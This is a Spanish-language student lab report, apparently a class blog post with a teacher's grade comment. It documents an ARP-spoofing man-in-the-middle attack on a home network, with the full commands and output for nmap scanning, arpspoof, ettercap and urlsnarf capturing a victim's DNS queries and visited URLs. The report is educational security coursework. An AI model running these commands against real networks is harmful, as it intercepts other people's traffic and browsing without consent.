Esta publicación servira a manera de reporte para la tarea de la clase, las herramientas utilizadas para la practica son las siguientes:
El sistema operativo de ambas computadoras fue Ubuntu de inux
- Nmap para rastrear ip's en mi red
- Arpspoof para realizar el ataque man in the middle
- Urlsnarf para filtrar URL's en la red
- Ettercap para filtrar paquetes
A grandes rasgos estos fueron los pasos que utilice para direccionar la conexión de la computadora afectada:
sudo su cat /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/ip_forward ifconfig nmap -sF 192.168.1.1-255 arpspoof -i interface -tarpspoof -i interface -t urlsnarf -i interface ettercap -T -i interface
Mi ejemplo practico
El primer paso fue permitir el reenvío de paquetes por parte de la computadora atacante, para eso solo cambiamos la variable del sistema "/proc/sys/net/ipv4/ip_forward" de la siguiente manera:
kalavera@kalavera-AOD270:~$ sudo su [sudo] password for kalavera: root@kalavera-AOD270:/home/kalavera# cat /proc/sys/net/ipv4/ip_forward 0 root@kalavera-AOD270:/home/kalavera# echo 1 > /proc/sys/net/ipv4/ip_forward root@kalavera-AOD270:/home/kalavera# cat /proc/sys/net/ipv4/ip_forward 1El siguiente paso es conocer cual es la dirección de la computadora en la que estamos trabajando en la red local y la interfaz con la cual esta conectada a la red. Como podemos ver la dirección de mi computadora durante la practica era la "192.168.1.67" puesta en la interfaz "wlan0"
root@kalavera-AOD270:/home/kalavera# ifconfig
wlan0 Link encap:Ethernet HWaddr --:--:--:--:--:--
inet addr:192.168.1.67 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::864b:f5ff:fe3c:37e0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:170763 errors:0 dropped:0 overruns:0 frame:0
TX packets:181064 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:109200759 (109.2 MB) TX bytes:103342011 (103.3 MB)
Ahora utilice Nmap para escanear las IP's de todas las computadoras conectadas a la red local, eso con el fin de encontrar la IP de la computadoraa la cual se le va a hacer el ataque.
root@kalavera-AOD270:/home/kalavera# nmap -sF 192.168.1.1-255 Starting Nmap 5.21 ( http://nmap.org ) at 2013-02-17 14:45 CST Nmap scan report for 192.168.1.67 Host is up (0.000080s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open|filtered http Nmap scan report for 192.168.1.105 Host is up (0.0055s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open|filtered http MAC Address: --:--:--:--:--:-- (Unknown) Nmap scan report for 192.168.1.254 Host is up (0.0052s latency). All 1000 scanned ports on 192.168.1.254 are open|filtered MAC Address: --:--:--:--:--:-- (Unknown) Nmap done: 255 IP addresses (5 hosts up) scanned in 55.74 seconds
Sabiendo que la IP del modem termina con 254 y la IP de nuestra computadora es la que termina con 67, podemos suponer que la IP de la computadora a la que se hara el ataque es la que tiene terminación 105.
Ahora haciendo uso de "arspoof" podemos empezar el ataque redireccionando los paquetes del modem al host.
root@kalavera-AOD270:/home/kalavera# arpspoof -i wlan0 -t 192.168.1.254 192.168.1.105 --:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.105 is-at --:--:--:--:--:-- --:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.105 is-at --:--:--:--:--:-- --:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.105 is-at --:--:--:--:--:-- --:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.105 is-at --:--:--:--:--:--
Y despues en sentido contrario.
root@kalavera-AOD270:/home/kalavera# arpspoof -i wlan0 -t 192.168.1.105 192.168.1.254 --:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.254 is-at --:--:--:--:--:-- --:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.254 is-at --:--:--:--:--:-- --:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.254 is-at --:--:--:--:--:-- --:--:--:--:--:-- --:--:--:--:--:-- 0806 42: arp reply 192.168.1.254 is-at --:--:--:--:--:--
Una vez que establecí el ataque man in the middle, en la red de nuestra computadora recibimos los paquetes del atacado. El host atacado puede ver que hay un intermediario escuchando en la red, utilizando el protocolo de resolución de direcciones. Con el siguiente comando:
max@juan-laptop:~$ arp -an ? (192.168.1.67) at 84:4b:f5:3c:37:e0 [ether] on wlan0 ? (192.168.1.254) at 84:4b:f5:3c:37:e0 [ether] on wlan0
EN este punto utilice ettercap para filtrar los paquetes que recibia la computadora, y mostrar en la terminal una lista con los paquetes filtrados.
root@kalavera-AOD270:/home/kalavera# ettercap -T -i wlan0 ettercap NG-0.7.4.2 copyright 2001-2005 ALoR & NaGA Listening on wlan0... (Ethernet) wlan0 -> --:--:--:--:--:-- 192.168.1.67 255.255.255.0 Sun Feb 17 15:21:34 2013 UDP 192.168.1.254:53 --> 192.168.1.105:44089 | D............shop.ubuntu.com.................U... Sun Feb 17 15:21:34 2013 UDP 192.168.1.105:33465 --> 192.168.1.254:53 | [............www.ubuntu.com..... Sun Feb 17 15:21:34 2013 UDP 192.168.1.254:53 --> 192.168.1.105:33465 | [............www.ubuntu.com.................[.YXComo podemos ver, el host atacado transmitió un mensaje entre una pagina de ubuntu y el.
El ultimo programa que utilice para filtrar paquetes es "urlsnarf" que se utiliza para filtrar las url visitadas en los paquetes, despues de activarlo en la computadora atacada, visite la pagina "groveshark" y los resultados fueron los siguientes:
-----root@kalavera-AOD270:/home/kalavera# urlsnarf -i wlan0 urlsnarf: listening on wlan0 [tcp port 80 or port 8080 or port 3128] juan-laptop.local - - [17/Feb/2013:15:27:30 -0600] "GET http://grooveshark.com/ HTTP/1.1" - - "-" "informacion de tu sistema operativo y navegador"
Como podemos ver el programa muestra la pagina visitada ademas de la información sobre el sistema operativo y el navegador de la computadora.
Buen día.
Cuida los acentos. Por lo general se dice "man in the middle" en singular. 10 pts.
ResponderBorrar